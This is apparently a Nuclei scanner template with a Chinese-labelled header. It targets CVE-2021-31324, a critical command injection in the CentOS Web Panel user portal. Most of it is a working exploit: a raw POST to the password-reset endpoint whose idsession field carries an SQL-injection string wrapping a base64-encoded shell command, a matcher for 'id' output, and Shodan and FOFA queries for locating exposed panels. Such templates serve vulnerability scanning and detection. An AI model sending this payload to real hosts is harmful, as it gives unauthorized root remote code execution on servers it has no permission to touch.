漏洞描述
The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.
CVE-2021-31324: CentOS Web Panel - OS Command Injection
PoC代码[已公开]
id: CVE-2021-31324
info:
name: CentOS Web Panel - OS Command Injection
author: ritikchaddha
severity: critical
description: |
The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.
reference:
- https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-31324
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-31324
cwe-id: CWE-78
epss-score: 0.82331
epss-percentile: 0.9918
cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:*
metadata:
vendor: control-webpanel
product: webpanel
shodan-query: title:"Login | Control WebPanel"
fofa-query: title="Login | Control WebPanel"
tags: cve,cve2021,centos,cwpsrv,os,rce
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(header, "cwpsrv")'
internal: true
- raw:
- |
POST /login/index.php?acc=newpass HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a%27+UNION+SELECT%27a%27%2C%27b%27%2C%27c%27%2C%27YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO2lkOyNgfHxhfHxifHxjfHxk%27%2C%27e%27%2C%27f%27--+p
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a004730450221009cd03335a5affd2f57edcd1c841edd68ae8cdae1a483d75eacc14a8bbbf32e6302204fb620539a442c6dddf65bd7f3c264c4af86be09b7e4d7b05ce1d3f0437eb147:922c64590222798bb761d5b6d8e72950